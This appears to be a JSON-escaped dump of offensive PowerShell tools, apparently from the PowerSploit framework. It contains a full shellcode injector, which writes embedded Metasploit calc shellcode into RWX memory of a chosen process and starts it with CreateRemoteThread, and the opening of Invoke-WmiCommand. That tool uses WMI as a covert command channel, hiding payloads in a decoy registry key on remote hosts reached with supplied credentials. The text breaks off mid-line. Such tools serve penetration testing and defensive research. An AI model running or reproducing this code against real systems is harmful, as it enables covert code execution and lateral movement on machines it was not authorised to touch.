[AppDomain]::CurrentDomain.GetAssemblies() |\r\n            Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }\r\n        $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')\r\n        # Get a reference to the GetModuleHandle and GetProcAddress methods\r\n        $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')\r\n        $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')\r\n        # Get a handle to the module specified\r\n        $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))\r\n        $tmpPtr = New-Object IntPtr\r\n        $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle)\r\n\r\n        # Return the address of the function\r\n        Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure))\r\n    }\r\n\r\n    # Emits a shellcode stub that when injected will create a thread and pass execution to the main shellcode payload\r\n    function Local:Emit-CallThreadStub ([IntPtr] $BaseAddr, [IntPtr] $ExitThreadAddr, [Int] $Architecture)\r\n    {\r\n        $IntSizePtr = $Architecture / 8\r\n\r\n        function Local:ConvertTo-LittleEndian ([IntPtr] $Address)\r\n        {\r\n            $LittleEndianByteArray = New-Object Byte[](0)\r\n            $Address.ToString(\"X$($IntSizePtr*2)\") -split '([A-F0-9]{2})' | ForEach-Object { if ($_) { $LittleEndianByteArray += [Byte] ('0x{0}' -f $_) } }\r\n            [System.Array]::Reverse($LittleEndianByteArray)\r\n\r\n            Write-Output $LittleEndianByteArray\r\n        }\r\n\r\n        $CallStub = New-Object Byte[](0)\r\n\r\n        if ($IntSizePtr -eq 8)\r\n        {\r\n            [Byte[]] $CallStub = 0x48,0xB8                      # MOV   QWORD RAX, &shellcode\r\n            $CallStub += ConvertTo-LittleEndian $BaseAddr       # &shellcode\r\n            $CallStub += 0xFF,0xD0                              # CALL  RAX\r\n            $CallStub += 0x6A,0x00                              # PUSH  BYTE 0\r\n            $CallStub += 0x48,0xB8                              # MOV   QWORD RAX, &ExitThread\r\n            $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread\r\n            $CallStub += 0xFF,0xD0                              # CALL  RAX\r\n        }\r\n        else\r\n        {\r\n            [Byte[]] $CallStub = 0xB8                           # MOV   DWORD EAX, &shellcode\r\n            $CallStub += ConvertTo-LittleEndian $BaseAddr       # &shellcode\r\n            $CallStub += 0xFF,0xD0                              # CALL  EAX\r\n            $CallStub += 0x6A,0x00                              # PUSH  BYTE 0\r\n            $CallStub += 0xB8                                   # MOV   DWORD EAX, &ExitThread\r\n            $CallStub += ConvertTo-LittleEndian $ExitThreadAddr # &ExitThread\r\n            $CallStub += 0xFF,0xD0                              # CALL  EAX\r\n        }\r\n\r\n        Write-Output $CallStub\r\n    }\r\n\r\n    function Local:Inject-RemoteShellcode ([Int] $ProcessID)\r\n    {\r\n        # Open a handle to the process you want to inject into\r\n        $hProcess = $OpenProcess.Invoke(0x001F0FFF, $false, $ProcessID) # ProcessAccessFlags.All (0x001F0FFF)\r\n\r\n        if (!$hProcess)\r\n        {\r\n            Throw \"Unable to open a process handle for PID: $ProcessID\"\r\n        }\r\n\r\n        $IsWow64 = $false\r\n\r\n        if ($64bitOS) # Only perform theses checks if CPU is 64-bit\r\n        {\r\n            # Determine if the process specified is 32 or 64 bit\r\n            $IsWow64Process.Invoke($hProcess, [Ref] $IsWow64) | Out-Null\r\n\r\n            if ((!$IsWow64) -and $PowerShell32bit)\r\n            {\r\n                Throw 'Shellcode injection targeting a 64-bit process from 32-bit PowerShell is not supported. Use the 64-bit version of Powershell if you want this to work.'\r\n            }\r\n            elseif ($IsWow64) # 32-bit Wow64 process\r\n            {\r\n                if ($Shellcode32.Length -eq 0)\r\n                {\r\n                    Throw 'No shellcode was placed in the $Shellcode32 variable!'\r\n                }\r\n\r\n                $Shellcode = $Shellcode32\r\n                Write-Verbose 'Injecting into a Wow64 process.'\r\n                Write-Verbose 'Using 32-bit shellcode.'\r\n            }\r\n            else # 64-bit process\r\n            {\r\n                if ($Shellcode64.Length -eq 0)\r\n                {\r\n                    Throw 'No shellcode was placed in the $Shellcode64 variable!'\r\n                }\r\n\r\n                $Shellcode = $Shellcode64\r\n                Write-Verbose 'Using 64-bit shellcode.'\r\n            }\r\n        }\r\n        else # 32-bit CPU\r\n        {\r\n            if ($Shellcode32.Length -eq 0)\r\n            {\r\n                Throw 'No shellcode was placed in the $Shellcode32 variable!'\r\n            }\r\n\r\n            $Shellcode = $Shellcode32\r\n            Write-Verbose 'Using 32-bit shellcode.'\r\n        }\r\n\r\n        # Reserve and commit enough memory in remote process to hold the shellcode\r\n        $RemoteMemAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)\r\n\r\n        if (!$RemoteMemAddr)\r\n        {\r\n            Throw \"Unable to allocate shellcode memory in PID: $ProcessID\"\r\n        }\r\n\r\n        Write-Verbose \"Shellcode memory reserved at 0x$($RemoteMemAddr.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n        # Copy shellcode into the previously allocated memory\r\n        $WriteProcessMemory.Invoke($hProcess, $RemoteMemAddr, $Shellcode, $Shellcode.Length, [Ref] 0) | Out-Null\r\n\r\n        # Get address of ExitThread function\r\n        $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread\r\n\r\n        if ($IsWow64)\r\n        {\r\n            # Build 32-bit inline assembly stub to call the shellcode upon creation of a remote thread.\r\n            $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 32\r\n\r\n            Write-Verbose 'Emitting 32-bit assembly call stub.'\r\n        }\r\n        else\r\n        {\r\n            # Build 64-bit inline assembly stub to call the shellcode upon creation of a remote thread.\r\n            $CallStub = Emit-CallThreadStub $RemoteMemAddr $ExitThreadAddr 64\r\n\r\n            Write-Verbose 'Emitting 64-bit assembly call stub.'\r\n        }\r\n\r\n        # Allocate inline assembly stub\r\n        $RemoteStubAddr = $VirtualAllocEx.Invoke($hProcess, [IntPtr]::Zero, $CallStub.Length, 0x3000, 0x40) # (Reserve|Commit, RWX)\r\n\r\n        if (!$RemoteStubAddr)\r\n        {\r\n            Throw \"Unable to allocate thread call stub memory in PID: $ProcessID\"\r\n        }\r\n\r\n        Write-Verbose \"Thread call stub memory reserved at 0x$($RemoteStubAddr.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n        # Write 32-bit assembly stub to remote process memory space\r\n        $WriteProcessMemory.Invoke($hProcess, $RemoteStubAddr, $CallStub, $CallStub.Length, [Ref] 0) | Out-Null\r\n\r\n        # Execute shellcode as a remote thread\r\n        $ThreadHandle = $CreateRemoteThread.Invoke($hProcess, [IntPtr]::Zero, 0, $RemoteStubAddr, $RemoteMemAddr, 0, [IntPtr]::Zero)\r\n\r\n        if (!$ThreadHandle)\r\n        {\r\n            Throw \"Unable to launch remote thread in PID: $ProcessID\"\r\n        }\r\n\r\n        # Close process handle\r\n        $CloseHandle.Invoke($hProcess) | Out-Null\r\n\r\n        Write-Verbose 'Shellcode injection complete!'\r\n    }\r\n\r\n    function Local:Inject-LocalShellcode\r\n    {\r\n        if ($PowerShell32bit) {\r\n            if ($Shellcode32.Length -eq 0)\r\n            {\r\n                Throw 'No shellcode was placed in the $Shellcode32 variable!'\r\n                return\r\n            }\r\n\r\n            $Shellcode = $Shellcode32\r\n            Write-Verbose 'Using 32-bit shellcode.'\r\n        }\r\n        else\r\n        {\r\n            if ($Shellcode64.Length -eq 0)\r\n            {\r\n                Throw 'No shellcode was placed in the $Shellcode64 variable!'\r\n                return\r\n            }\r\n\r\n            $Shellcode = $Shellcode64\r\n            Write-Verbose 'Using 64-bit shellcode.'\r\n        }\r\n\r\n        # Allocate RWX memory for the shellcode\r\n        $BaseAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $Shellcode.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)\r\n        if (!$BaseAddress)\r\n        {\r\n            Throw \"Unable to allocate shellcode memory in PID: $ProcessID\"\r\n        }\r\n\r\n        Write-Verbose \"Shellcode memory reserved at 0x$($BaseAddress.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n        # Copy shellcode to RWX buffer\r\n        [System.Runtime.InteropServices.Marshal]::Copy($Shellcode, 0, $BaseAddress, $Shellcode.Length)\r\n\r\n        # Get address of ExitThread function\r\n        $ExitThreadAddr = Get-ProcAddress kernel32.dll ExitThread\r\n\r\n        if ($PowerShell32bit)\r\n        {\r\n            $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 32\r\n\r\n            Write-Verbose 'Emitting 32-bit assembly call stub.'\r\n        }\r\n        else\r\n        {\r\n            $CallStub = Emit-CallThreadStub $BaseAddress $ExitThreadAddr 64\r\n\r\n            Write-Verbose 'Emitting 64-bit assembly call stub.'\r\n        }\r\n\r\n        # Allocate RWX memory for the thread call stub\r\n        $CallStubAddress = $VirtualAlloc.Invoke([IntPtr]::Zero, $CallStub.Length + 1, 0x3000, 0x40) # (Reserve|Commit, RWX)\r\n        if (!$CallStubAddress)\r\n        {\r\n            Throw \"Unable to allocate thread call stub.\"\r\n        }\r\n\r\n        Write-Verbose \"Thread call stub memory reserved at 0x$($CallStubAddress.ToString(\"X$([IntPtr]::Size*2)\"))\"\r\n\r\n        # Copy call stub to RWX buffer\r\n        [System.Runtime.InteropServices.Marshal]::Copy($CallStub, 0, $CallStubAddress, $CallStub.Length)\r\n\r\n        # Launch shellcode in it's own thread\r\n        $ThreadHandle = $CreateThread.Invoke([IntPtr]::Zero, 0, $CallStubAddress, $BaseAddress, 0, [IntPtr]::Zero)\r\n        if (!$ThreadHandle)\r\n        {\r\n            Throw \"Unable to launch thread.\"\r\n        }\r\n\r\n        # Wait for shellcode thread to terminate\r\n        $WaitForSingleObject.Invoke($ThreadHandle, 0xFFFFFFFF) | Out-Null\r\n\r\n        $VirtualFree.Invoke($CallStubAddress, $CallStub.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)\r\n        $VirtualFree.Invoke($BaseAddress, $Shellcode.Length + 1, 0x8000) | Out-Null # MEM_RELEASE (0x8000)\r\n\r\n        Write-Verbose 'Shellcode injection complete!'\r\n    }\r\n\r\n    # A valid pointer to IsWow64Process will be returned if CPU is 64-bit\r\n    $IsWow64ProcessAddr = Get-ProcAddress kernel32.dll IsWow64Process\r\n\r\n    $AddressWidth = $null\r\n\r\n    try {\r\n        $AddressWidth = @(Get-WmiObject -Query 'SELECT AddressWidth FROM Win32_Processor')[0] | Select-Object -ExpandProperty AddressWidth\r\n    } catch {\r\n        throw 'Unable to determine OS processor address width.'\r\n    }\r\n\r\n    switch ($AddressWidth) {\r\n        '32' {\r\n            $64bitOS = $False\r\n        }\r\n\r\n        '64' {\r\n            $64bitOS = $True\r\n\r\n            $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])\r\n    \t    $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)\r\n        }\r\n\r\n        default {\r\n            throw 'Invalid OS address width detected.'\r\n        }\r\n    }\r\n\r\n    if ([IntPtr]::Size -eq 4)\r\n    {\r\n        $PowerShell32bit = $true\r\n    }\r\n    else\r\n    {\r\n        $PowerShell32bit = $false\r\n    }\r\n\r\n    if ($PSBoundParameters['Shellcode'])\r\n    {\r\n        # Users passing in shellcode  through the '-Shellcode' parameter are responsible for ensuring it targets\r\n        # the correct architechture - x86 vs. x64. This script has no way to validate what you provide it.\r\n        [Byte[]] $Shellcode32 = $Shellcode\r\n        [Byte[]] $Shellcode64 = $Shellcode32\r\n    }\r\n    else\r\n    {\r\n        # Pop a calc... or whatever shellcode you decide to place in here\r\n        # I sincerely hope you trust that this shellcode actually pops a calc...\r\n        # Insert your shellcode here in the for 0xXX,0xXX,...\r\n        # 32-bit payload\r\n        # msfpayload windows/exec CMD=\"cmd /k calc\" EXITFUNC=thread\r\n        [Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\r\n                                  0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\r\n                                  0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\r\n                                  0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\r\n                                  0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\r\n                                  0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\r\n                                  0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,\r\n                                  0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\r\n                                  0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\r\n                                  0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5,\r\n                                  0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,\r\n                                  0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63,\r\n                                  0x61,0x6c,0x63,0x00)\r\n\r\n        # 64-bit payload\r\n        # msfpayload windows/x64/exec CMD=\"calc\" EXITFUNC=thread\r\n        [Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,\r\n                                  0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,\r\n                                  0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,\r\n                                  0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,\r\n                                  0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,\r\n                                  0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,\r\n                                  0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,\r\n                                  0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,\r\n                                  0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,\r\n                                  0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,\r\n                                  0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,\r\n                                  0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,\r\n                                  0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,\r\n                                  0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,\r\n                                  0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,\r\n                                  0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,\r\n                                  0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00)\r\n    }\r\n\r\n    if ( $PSBoundParameters['ProcessID'] )\r\n    {\r\n        # Inject shellcode into the specified process ID\r\n        $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess\r\n        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])\r\n        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)\r\n        $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx\r\n        $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr])\r\n        $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)\r\n        $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory\r\n        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool])\r\n        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)\r\n        $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread\r\n        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\r\n        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)\r\n        $CloseHandleAddr = Get-ProcAddress kernel32.dll CloseHandle\r\n        $CloseHandleDelegate = Get-DelegateType @([IntPtr]) ([Bool])\r\n        $CloseHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CloseHandleAddr, $CloseHandleDelegate)\r\n\r\n        Write-Verbose \"Injecting shellcode into PID: $ProcessId\"\r\n\r\n        if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',\r\n                 \"Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!\" ) )\r\n        {\r\n            Inject-RemoteShellcode $ProcessId\r\n        }\r\n    }\r\n    else\r\n    {\r\n        # Inject shellcode into the currently running PowerShell process\r\n        $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc\r\n        $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])\r\n        $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)\r\n        $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree\r\n        $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [Uint32], [UInt32]) ([Bool])\r\n        $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)\r\n        $CreateThreadAddr = Get-ProcAddress kernel32.dll CreateThread\r\n        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])\r\n        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)\r\n        $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject\r\n        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [Int32]) ([Int])\r\n        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)\r\n\r\n        Write-Verbose \"Injecting shellcode into PowerShell\"\r\n\r\n        if ( $Force -or $psCmdlet.ShouldContinue( 'Do you wish to carry out your evil plans?',\r\n                 \"Injecting shellcode into the running PowerShell process!\" ) )\r\n        {\r\n            Inject-LocalShellcode\r\n        }\r\n    }\r\n}\r\n"
  },
  {
    "path": "CodeExecution/Invoke-WmiCommand.ps1",
    "content": "function Invoke-WmiCommand {\n<#\n.SYNOPSIS\n\nExecutes a PowerShell ScriptBlock on a target computer using WMI as a\npure C2 channel.\n\nAuthor: Matthew Graeber  \nLicense: BSD 3-Clause  \nRequired Dependencies: None  \nOptional Dependencies: None  \n\n.DESCRIPTION\n\nInvoke-WmiCommand executes a PowerShell ScriptBlock on a target\ncomputer using WMI as a pure C2 channel. It does this by using the\nStdRegProv WMI registry provider methods to store a payload into a\nregistry value. The command is then executed on the victim system and\nthe output is stored in another registry value that is then retrieved\nremotely.\n\n.PARAMETER Payload\n\nSpecifies the payload to be executed on the remote system.\n\n.PARAMETER RegistryKeyPath\n\nSpecifies the registry key where the payload and payload output will\nbe stored.\n\n.PARAMETER RegistryPayloadValueName\n\nSpecifies the registry value name where the payload will be stored.\n\n.PARAMETER RegistryResultValueName\n\nSpecifies the registry value name where the payload output will be\nstored.\n\n.PARAMETER ComputerName\n\nRuns the command on the specified computers. The default is the local\ncomputer.\n\nType the NetBIOS name, an IP address, or a fully qualified domain\nname of one or more computers. To specify the local computer, type\nthe computer name, a dot (.), or \"localhost\".\n\nThis parameter does not rely on Windows PowerShell remoting. You can\nuse the ComputerName parameter even if your computer is not\nconfigured to run remote commands.\n\n.PARAMETER Credential\n\nSpecifies a user account that has permission to perform this action.\nThe default is the current user. Type a user name, such as \"User01\",\n\"Domain01\\User01\", or User@Contoso.com. Or, enter a PSCredential\nobject, such as an object that is returned by the Get-Credential\ncmdlet. When you type a user name, you will be prompted for a\npassword.\n\n.PARAMETER Impersonation\n\nSpecifies the impersonation level to use. Valid values are:\n\n0: Default (Reads the local registry for the default impersonation level, which is usually set to \"3: Impersonate\".)\n\n1: Anonymous (Hides the credentials of the caller.)\n\n2: Identify (Allows objects to query the credentials of the caller.)\n\n3: Impersonate (Allows objects to use the credentials of the caller.)\n\n4: Delegate (Allows objects to permit other objects to use the credentials of the caller.)\n\n.PARAMETER Authentication\n\nSpecifies the authentication level to be used with the WMI connection. Valid values are:\n\n-1: Unchanged\n\n0: Default\n\n1: None (No authentication in performed.)\n\n2: Connect (Authentication is performed only when the client establishes a relationship with the application.)\n\n3: Call (Authentication is performed only at the beginning of each call when the application receives the request.)\n\n4: Packet (Authentication is performed on all the data that is received from the client.)\n\n5: PacketIntegrity (All the data that is transferred between the client  and the application is authenticated and verified.)\n\n6: PacketPrivacy (The properties of the other authentication levels are used, and all the data is encrypted.)\n\n.PARAMETER EnableAllPrivileges\n\nEnables all the privileges of the current user before the command\nmakes the WMI call.\n\n.PARAMETER Authority\n\nSpecifies the authority to use to authenticate the WMI connection.\nYou can specify standard NTLM or Kerberos authentication. To use\nNTLM, set the authority setting to ntlmdomain:<DomainName>, where\n<DomainName> identifies a valid NTLM domain name. To use Kerberos,\nspecify kerberos:<DomainName\\ServerName>. You cannot include the\nauthority setting when you connect to the local computer.\n\n.EXAMPLE\n\nPS C:\\>Invoke-WmiCommand -Payload { if ($True) { 'Do Evil' } } -Credential 'TargetDomain\\TargetUser' -ComputerName '10.10.1.1'\n\n.EXAMPLE\n\nPS C:\\>$Hosts = Get-Content hostnames.txt\nPS C:\\>$Payload = Get-Content payload.ps1\nPS C:\\>$Credential = Get-Credential 'TargetDomain\\TargetUser'\nPS C:\\>$Hosts | Invoke-WmiCommand -Payload $Payload -Credential $Credential\n\n.EXAMPLE\n\nPS C:\\>$Payload = Get-Content payload.ps1\nPS C:\\>Invoke-WmiCommand -Payload $Payload -Credential 'TargetDomain\\TargetUser' -ComputerName '10.10.1.1', '10.10.1.2'\n\n.EXAMPLE\n\nPS C:/>Invoke-WmiCommand -Payload { 1+3+2+1+1 } -RegistryHive HKEY_LOCAL_MACHINE -RegistryKeyPath 'SOFTWARE\\testkey' -RegistryPayloadValueName 'testvalue' -RegistryResultValueName 'testresult' -ComputerName '10.10.1.1' -Credential 'TargetHost\\Administrator' -Verbose\n\n.INPUTS\n\nSystem.String[]\n\nAccepts one or more host names/IP addresses over the pipeline.\n\n.OUTPUTS\n\nSystem.Management.Automation.PSObject\n\nOutputs a custom object consisting of the target computer name and\nthe output of the command executed.\n\n.NOTES\n\nIn order to receive the output from your payload, it must return\nactual objects. For example, Write-Host doesn't return objects\nrather, it writes directly to the console. If you're using\nWrite-Host in your scripts though, you probably don't deserve to get\nthe output of your payload back. :P\n#>\n\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]\n    [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingInvokeExpression', '')]\n    [CmdletBinding()]\n    Param (\n        [Parameter( Mandatory = $True )]\n        [ScriptBlock]\n        $Payload,\n\n        [String]\n        [ValidateSet( 'HKEY_LOCAL_MACHINE',\n                      'HKEY_CURRENT_USER',\n                      'HKEY_CLASSES_ROOT',\n                      'HKEY_USERS',\n                      'HKEY_CURRENT_CONFIG' )]\n        $RegistryHive = 'HKEY_CURRENT_USER',\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $RegistryKeyPath = 'SOFTWARE\\Microsoft\\Cryptography\\RNG',\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $RegistryPayloadValueName = 'Seed',\n\n        [String]\n        [ValidateNotNullOrEmpty()]\n        $RegistryResultValueName = 'Value',\n\n        [Parameter( ValueFromPipeline = $True )]\n        [Alias('Cn')]\n        [String[]]\n        [ValidateNotNullOrEmpty()]\n        $ComputerName = 'localhost',\n\n        [Management.Automation.PSCredential]\n        [Management.Automation.CredentialAttribute()]\n        $Credential = [Management.Automation.PSCredential]::Empty,\n\n        [Management.ImpersonationLevel]\n        $Impersonation,\n\n        [System.Management.AuthenticationLevel]\n        $Authentication,\n\n        [Switch]\n        $EnableAllPrivileges,\n\n        [String]\n        $Authority\n    )\n\n    BEGIN {\n        switch ($RegistryHive) {\n            'HKEY_LOCAL_MACHINE' { $Hive = 2147483650 }\n            'HKEY_CURRENT_USER' { $Hive = 2147483649 }\n            'HKEY_CLASSES_ROOT' { $Hive = 2147483648 }\n            'HKEY_USERS' { $Hive = 2147483651 }\n            'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 }\n        }\n\n        $HKEY_LOCAL_MACHINE = 2147483650\n\n        $WmiMethodArgs = @{}\n\n        # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod\n        if ($PSBoundParameters['Credential']) { $WmiMethodArgs['Credential'] = $Credential }\n        if ($PSBoundParameters['Impersonation']) { $WmiMethodArgs['Impersonation'] = $Impersonation }\n        if ($PSBoundParameters['Authentication']) { $WmiMethodArgs['Authentication'] = $Authentication }\n        if ($PSBoundParameters['EnableAllPrivileges']) { $WmiMethodArgs['EnableAllPrivileges'] = $EnableAllPrivileges }\n        if ($PSBoundParameters['Authority']) { $WmiMethodArgs['Authority'] = $Authority }\n\n        $AccessPermissions = @{\n            KEY_QUERY_VALUE = 1\n            KEY_SET_VALUE = 2\n            KEY_CREATE_SUB_KEY = 4\n            KEY_CREATE = 32\n            DELETE = 65536\n        }\n\n        # These are all of the registry permissions we'll require\n        $RequiredPermissions = $AccessPermissions['KEY_QUERY_VALUE'] -bor\n                               $AccessPermissions['KEY_SET_VALUE'] -bor\n                               $AccessPermissions['KEY_CREATE_SUB_KEY'] -bor\n                               $AccessPermissions['KEY_CREATE'] -bor\n                               $AccessPermissions['DELETE']\n    }\n\n    PROCESS {\n        foreach ($Computer in $ComputerName) {\n            # Pass the individual computer name to Invoke-WmiMethod\n            $WmiMethodArgs['ComputerName'] = $Computer\n\n            Write-Verbose \"[$Computer] Creating the following registry key: $RegistryHive\\$RegistryKeyPath\"\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'CreateKey' -ArgumentList $Hive, $RegistryKeyPath\n\n            if ($Result.ReturnValue -ne 0) {\n                throw \"[$Computer] Unable to create the following registry key: $RegistryHive\\$RegistryKeyPath\"\n            }\n\n            Write-Verbose \"[$Computer] Validating read/write/delete privileges for the following registry key: $RegistryHive\\$RegistryKeyPath\"\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'CheckAccess' -ArgumentList $Hive, $RegistryKeyPath, $RequiredPermissions\n\n            if (-not $Result.bGranted) {\n                throw \"[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand.\"\n            }\n\n            $PSSettingsPath = 'SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell'\n            $PSPathValueName = 'Path'\n\n            $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList 